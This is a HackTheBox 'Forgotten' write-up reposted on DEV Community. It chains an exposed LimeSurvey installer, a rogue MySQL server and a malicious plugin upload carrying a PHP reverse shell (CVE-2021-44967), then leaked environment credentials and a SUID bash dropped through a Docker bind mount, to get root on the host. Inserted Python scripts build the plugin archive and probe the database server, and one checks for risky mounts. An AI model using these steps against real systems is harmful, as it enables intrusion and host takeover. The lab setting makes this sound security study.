DEV Community

Yogeshwar Peela

Originally published at exploitnotes.hashnode.dev

Hackthebox: Forgotten Writeup

Summary

Forgotten is a HackTheBox machine centred on an exposed LimeSurvey installer endpoint that was never locked down after deployment. By standing up a rogue MySQL server, an attacker can hijack the installation flow and create a fresh admin account on the target's LimeSurvey instance. From there, a known RCE in LimeSurvey's plugin upload feature (CVE-2021-44967) gives a foothold inside a Docker container. Environment variables leak the container user's password, which is reused for SSH to the host OS. Finally, a Docker volume bind-mounted between the container and the host lets a SUID bash dropped from inside the container be executed on the host, yielding root on the underlying system.


Reconnaissance

Port Scan

nmap -sC -sV -A <MACHINE-IP> -oA nmap

Open ports:

Port  Service  Version
22    SSH      OpenSSH 8.9p1 (Ubuntu)
80    HTTP     Apache 2.4.56 (Debian)

The HTTP root returns a 403 Forbidden. The Server header leaks Apache/2.4.56 (Debian), and the nmap host information shows the internal Docker address 172.17.0.2, both hinting at a containerised web application. The mismatch between the SSH banner (Ubuntu) and the Apache banner (Debian) points the same way: the web server is running on a different base image from the host.

Directory Enumeration

ffuf -u http://forgotten.vl/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Key finding:

survey    [Status: 301]

Browsing to http://forgotten.vl/survey reveals a LimeSurvey application.


Initial Access

Stage 1 - Exploiting the Exposed LimeSurvey Installer

Navigating to http://forgotten.vl/survey/index.php?r=installer/precheck showed that the LimeSurvey installer was still reachable and had not been removed or locked after deployment, a critical misconfiguration.

Pre-installation check (Step 3) leaked the version:

LimeSurvey 6.3.7

A quick search turned up CVE-2021-44967, an authenticated RCE in LimeSurvey via plugin upload (the CVE entry was filed against 5.2.4, but the underlying behaviour, accepting a plugin archive that contains arbitrary PHP, is what matters here). The catch: admin access is required. The exposed installer offered a way to create our own admin account.

Stage 2 - Rogue MySQL Server

The installer's Step 4 (Database Configuration) asks for a database host. Since we control which host the target application connects to, we stood up our own MySQL server. With the official image, setting MYSQL_ROOT_PASSWORD creates a root account that may connect from any host ('%'), which is exactly what the target needs:

docker run -p 3306:3306 --rm --name evil-mysql \
  -e MYSQL_ROOT_PASSWORD=pass123 mysql:latest

Verified it was listening:

netstat -tanp | grep -i list
# tcp  0.0.0.0:3306  LISTEN  docker-proxy
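Before typing our address into the installer, it is worth confirming that the rogue server answers on the interface the target will reach, and seeing what the target's PHP client is about to negotiate. The following is an added example, not part of the original writeup: it connects, reads the unsolicited MySQL greeting and decodes the server version and authentication plugin. The host and port arguments are assumptions (use the address you will enter in the installer), and build_sample_handshake() is a constructed packet so the parser can be checked offline.

```python
"""Confirm a rogue MySQL server answers before pointing the installer at it.

Added example for this writeup, not part of the original post. It reads the
unsolicited greeting MySQL sends on connect (HandshakeV10, MySQL 4.1+) and
decodes the fields a client needs: server version and auth plugin. Host and
port are assumptions: use the address you will type into the installer.
"""
import socket
import struct

CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x80000


def parse_handshake(packet):
    """Decode a HandshakeV10 packet, 4-byte packet header included."""
    length = int.from_bytes(packet[0:3], "little")
    sequence = packet[3]
    body = packet[4:4 + length]
    if not body or body[0] != 10:
        raise ValueError("not a MySQL HandshakeV10 greeting")
    end = body.index(b"\x00", 1)
    server_version = body[1:end].decode("ascii", "replace")
    pos = end + 1
    connection_id = struct.unpack_from("<I", body, pos)[0]
    pos += 4
    salt = body[pos:pos + 8]          # auth_plugin_data_part_1
    pos += 8 + 1                      # ... plus one filler byte
    cap_low, charset, status, cap_high, auth_len = struct.unpack_from("<HBHHB", body, pos)
    pos += 8 + 10                     # those fields plus 10 reserved bytes
    capabilities = cap_low | (cap_high << 16)
    if capabilities & CLIENT_SECURE_CONNECTION:
        part2_len = max(13, auth_len - 8)
        salt += body[pos:pos + part2_len].rstrip(b"\x00")
        pos += part2_len
    auth_plugin = ""
    if capabilities & CLIENT_PLUGIN_AUTH:
        auth_plugin = body[pos:body.index(b"\x00", pos)].decode("ascii", "replace")
    return {
        "sequence": sequence,
        "server_version": server_version,
        "connection_id": connection_id,
        "capabilities": capabilities,
        "charset": charset,
        "status": status,
        "auth_plugin": auth_plugin,
        "salt_len": len(salt),
    }


def probe_mysql(host, port=3306, timeout=5.0):
    """Connect, read the greeting, disconnect. No credentials are sent."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = sock.recv(1024)
    return parse_handshake(data)


def build_sample_handshake():
    """Constructed greeting in the shape mysql:latest (8.x) sends; used so
    the parser can be exercised offline without a live server."""
    body = (
        b"\x0a" + b"8.4.0\x00"                       # protocol 10, version
        + struct.pack("<I", 7)                       # connection id
        + b"A" * 8 + b"\x00"                         # salt part 1, filler
        + struct.pack("<HBHHB", 0xFFFF, 0xFF, 0x0002, 0xDFFF, 21)
        + b"\x00" * 10                               # reserved
        + b"B" * 12 + b"\x00"                        # salt part 2 (13 bytes)
        + b"caching_sha2_password\x00"
    )
    return len(body).to_bytes(3, "little") + b"\x00" + body


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print(probe_mysql(host))
```

Seeing caching_sha2_password from mysql:latest is fine here: PHP's mysqlnd driver has supported it since 7.4, so LimeSurvey's connection will succeed. Running the probe against your own external address (not 127.0.0.1) also proves the docker-proxy port is reachable in the direction that matters.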

In the installer form (Step 4, Configuration), we provided:

Field              Value
Database type      MySQL
Database location  <YOUR-IP>:3306 (our Kali IP)
Database user      root
Database password  pass123
Database name      test
Table prefix       lime_

Proceeding to Step 5, the installer reported "Database doesn't exist" and offered to create it; we clicked Create database, which our rogue MySQL accepted. After clicking Populate database, Step 6 (Administrator Settings) appeared, letting us set a known admin password.

Installation completed with our own admin credentials. Note that the application now stores its data, including the admin user we just created, in our rogue database, so the MySQL container has to stay up and reachable from the target for the rest of the attack.

Stage 3 - RCE via LimeSurvey Plugin Upload (CVE-2021-44967)

With admin access at http://forgotten.vl/survey/index.php/admin/authentication/sa/login, we exploited the plugin upload functionality.

Crafted a malicious plugin archive:

config.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>ExamplePlugin</name>
        <type>plugin</type>
        <author>exploitnotes</author>
        <version>1.0</version>
        <description>Example Plugin</description>
    </metadata>
    <compatibility>
        <version>6.3</version>
    </compatibility>
</config>

rev-shell.php: A standard PHP reverse shell (pentestmonkey) pointing back to <YOUR-IP>:4444.

zip evil.zip rev-shell.php config.xml

Upload steps:

  1. Navigate to Configuration → Plugins → Upload & Install
  2. Upload evil.zip
  3. Confirm installation
  4. Start a netcat listener: nc -lvnp 4444
  5. Trigger the shell: curl http://forgotten.vl/survey/upload/plugins/ExamplePlugin/rev-shell.php

Shell received:

limesvc@efaa6f5097ed:/$ whoami
limesvc
limesvc@efaa6f5097ed:/$ id
uid=2000(limesvc) gid=2000(limesvc) groups=2000(limesvc),27(sudo)
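The packaging step above can be scripted so that the plugin name, the payload file name and the trigger URL cannot drift apart. This is an added example, not the author's script or LimeSurvey code. It assumes, as the writeup shows, that LimeSurvey unpacks the archive into upload/plugins/<name>/ where <name> is metadata/name from config.xml; SAMPLE_PAYLOAD is a constructed placeholder to be replaced with the reverse shell.

```python
"""Package a LimeSurvey plugin archive and derive the URL that will execute it.

Added example for this writeup, not LimeSurvey's code or the author's script.
Assumptions (labelled here and in the comments): LimeSurvey extracts the
archive into upload/plugins/<name>/ where <name> is metadata/name from
config.xml, so that name must match the directory in the trigger URL; the
payload below is a constructed stand-in for the pentestmonkey shell.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

CONFIG_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>{name}</name>
        <type>plugin</type>
        <author>{author}</author>
        <version>1.0</version>
        <description>{description}</description>
    </metadata>
    <compatibility>
        <version>{compat}</version>
    </compatibility>
</config>
"""

# Constructed placeholder: substitute the real reverse shell before use.
SAMPLE_PAYLOAD = "<?php echo 'plugin-ok'; ?>\n"


def build_plugin_zip(name, payload_filename, payload_php,
                     author="exploitnotes", description="Example Plugin",
                     compat="6.3"):
    """Return the bytes of a zip holding config.xml plus the PHP file."""
    # The name becomes a path segment on the server: refuse anything that
    # could escape the plugin directory or break the trigger URL.
    if not re.fullmatch(r"[A-Za-z][A-Za-z0-9_]*", name):
        raise ValueError(f"unsafe plugin name: {name!r}")
    if not re.fullmatch(r"[A-Za-z0-9_.-]+\.php", payload_filename):
        raise ValueError(f"payload must be a plain .php filename: {payload_filename!r}")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("config.xml", CONFIG_TEMPLATE.format(
            name=name, author=author, description=description, compat=compat))
        zf.writestr(payload_filename, payload_php)
    return buf.getvalue()


def inspect_plugin_zip(data):
    """Read the archive back: the sanity check to run before uploading."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        files = sorted(zf.namelist())
        root = ET.fromstring(zf.read("config.xml"))
    return {
        "name": root.findtext("metadata/name"),
        "type": root.findtext("metadata/type"),
        "compat": root.findtext("compatibility/version"),
        "files": files,
    }


def trigger_url(base_url, plugin_name, payload_filename):
    """URL of the uploaded file once LimeSurvey has unpacked the plugin
    (assumption: upload/plugins/<name>/ layout, as in the writeup)."""
    return f"{base_url.rstrip('/')}/upload/plugins/{plugin_name}/{payload_filename}"


if __name__ == "__main__":
    archive = build_plugin_zip("ExamplePlugin", "rev-shell.php", SAMPLE_PAYLOAD)
    with open("evil.zip", "wb") as fh:
        fh.write(archive)
    print(inspect_plugin_zip(archive))
    print(trigger_url("http://forgotten.vl/survey", "ExamplePlugin", "rev-shell.php"))
```

Run it once with the listener already up; the printed URL is the one to curl. The name check exists because metadata/name ends up as a directory name on the target, and a name with path separators would either fail to install or land the file somewhere the trigger URL does not point.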

Post-Exploitation

Docker Container Confirmation

The presence of /.dockerenv and the container-style hostname efaa6f5097ed, together with ifconfig showing inet 172.17.0.2 (the default Docker bridge range), confirmed we were inside a Docker container rather than on the host OS.

Credential Discovery via Environment Variables

limesvc@efaa6f5097ed:/$ env

The environment dump revealed:

LIMESURVEY_ADMIN=limesvc
LIMESURVEY_PASS=5W5HN4K4GCXf9E

These credentials had been passed into the container as environment variables, so any process running inside it, including the web server user we landed as, can read them.

Sudo Escalation Inside Container

sudo -l
# (using LIMESURVEY_PASS as password)
# User limesvc may run the following commands: (ALL : ALL) ALL

sudo -i
root@efaa6f5097ed:~#

Root inside the container — but still containerized.


Host Escape & Privilege Escalation

Volume Mount Enumeration

Inspecting mounts revealed a bind mount:

/dev/root on /var/www/html/survey type ext4 (rw,relatime...)

The container's /var/www/html/survey directory is bind-mounted read-write from /opt/limesurvey on the host. Crucially, files written inside the container appear on the host with their original ownership and permission bits, SUID included: uid 0 inside the container is uid 0 on the host because Docker is not using user-namespace remapping, and the mount was not made nosuid.

SUID Bash Binary Drop

From inside the container (as root):

cp /bin/bash /var/www/html/survey/bash
chmod +s /var/www/html/survey/bash
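What makes the drop work is a mount that is writable and not nosuid on a filesystem the host also sees. The following added example (not the author's tooling) checks for that condition from `mount`-style output and lists setuid files that have landed under a path; SAMPLE_MOUNTS is constructed to mirror the container above, and make_demo_tree() builds a throwaway directory so the scan can be run anywhere.

```python
"""Find the condition this escape depends on: a writable mount that is not
nosuid, and setuid files that landed on it. Added example for this writeup,
not the author's tooling. It parses `mount`-style lines
("<source> on <target> type <fstype> (<options>)"); the sample lines are
constructed to mirror the container in the writeup, and the demo tree is a
temporary directory created by the script itself.
"""
import os
import re
import stat
import tempfile

MOUNT_LINE = re.compile(
    r"^(?P<src>\S+) on (?P<target>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)")

# Filesystems that are not shared with the host (pseudo-fs, the overlay
# rootfs) and so are not an escape path even when rw without nosuid.
NOT_SHARED = {"proc", "sysfs", "cgroup", "cgroup2", "devpts", "mqueue", "tmpfs", "overlay"}

# Constructed sample in the shape of `mount` output inside the container.
SAMPLE_MOUNTS = """\
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/a:/var/lib/docker/overlay2/l/b,upperdir=/var/lib/docker/overlay2/x/diff,workdir=/var/lib/docker/overlay2/x/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
/dev/root on /var/www/html/survey type ext4 (rw,relatime)
"""


def parse_mount_line(line):
    m = MOUNT_LINE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["opts"] = set(entry["opts"].split(","))
    return entry


def risky_mounts(mount_output):
    """Targets mounted rw without nosuid on a filesystem the host also sees."""
    hits = []
    for line in mount_output.splitlines():
        entry = parse_mount_line(line)
        if entry is None or entry["fstype"] in NOT_SHARED:
            continue
        if "rw" in entry["opts"] and "nosuid" not in entry["opts"]:
            hits.append(entry["target"])
    return hits


def find_setuid(root):
    """(path, owner uid, mode) for regular files with setuid or setgid set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def make_demo_tree():
    """Temporary directory with one setuid file (what the copied, chmod'ed
    bash looks like from the host) and one ordinary file; returns its path."""
    root = tempfile.mkdtemp(prefix="survey-")
    suid = os.path.join(root, "bash")
    with open(suid, "wb") as fh:
        fh.write(b"#!/bin/sh\n")  # stand-in for the copied bash binary
    os.chmod(suid, 0o4755)
    plain = os.path.join(root, "index.php")
    with open(plain, "wb") as fh:
        fh.write(b"<?php\n")
    os.chmod(plain, 0o644)
    return root


if __name__ == "__main__":
    print("rw mounts without nosuid:", risky_mounts(SAMPLE_MOUNTS))
    print("setuid files:", find_setuid(make_demo_tree()))
```

Inside the container, feed risky_mounts the real output of mount (Docker's own file bind mounts for /etc/hosts, /etc/hostname and /etc/resolv.conf will show up too; they are single files, not a place to drop a binary, but worth noting). On the host, point find_setuid at /opt/limesurvey or any other bind-mounted path to see what came across. Two defences each break the chain on their own: mounting the volume with nosuid, and enabling userns-remap so that container root becomes an unprivileged host uid and the copied bash is no longer owned by root.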

SSH to Host

The credentials discovered in the container's environment also worked for SSH on the host:

ssh limesvc@forgotten.vl
# Password: 5W5HN4K4GCXf9E

User flag obtained:

limesvc@forgotten:~$ cat user.txt
[REDACTED]

Root via SUID Bash

The SUID bash binary dropped through the shared volume appeared at /opt/limesurvey/bash on the host:

limesvc@forgotten:/opt/limesurvey$ ./bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
[REDACTED]

Attack Chain

Exposed LimeSurvey installer (/survey/index.php?r=installer)
        │
        ▼
Rogue MySQL server → hijack DB config step → create admin account
        │
        ▼
Authenticated as admin → CVE-2021-44967 plugin upload RCE
        │
        ▼
Shell as limesvc inside Docker container
        │
        ▼
Environment variables leak LIMESURVEY_PASS
        │
        ▼
sudo -i → root inside container
        │
        ▼
Shared volume (/var/www/html/survey ↔ /opt/limesurvey) → drop SUID bash
        │
        ▼
SSH to host as limesvc → ./bash -p → root on host

Key Vulnerabilities

1. Exposed installer endpoint: the LimeSurvey installer was left reachable in production. Impact: full application reinstallation and admin account creation.
2. Rogue database server accepted: the installer trusts any externally supplied DB host without validation. Impact: the attacker supplies and controls the application's database.
3. CVE-2021-44967: authenticated RCE via plugin upload, exploited here against LimeSurvey 6.3.7. Impact: remote code execution as the web server user.
4. Credentials in environment variables: LIMESURVEY_PASS readable via env inside the container. Impact: password reuse gives SSH access to the host.
5. Docker volume shared with the host (rw): the container web root is bind-mounted from the host filesystem without nosuid. Impact: container escape via a SUID binary drop.
6. SUID bash privilege escalation: an arbitrary file write as container root becomes a root-owned SUID bash on the host. Impact: full host root access.
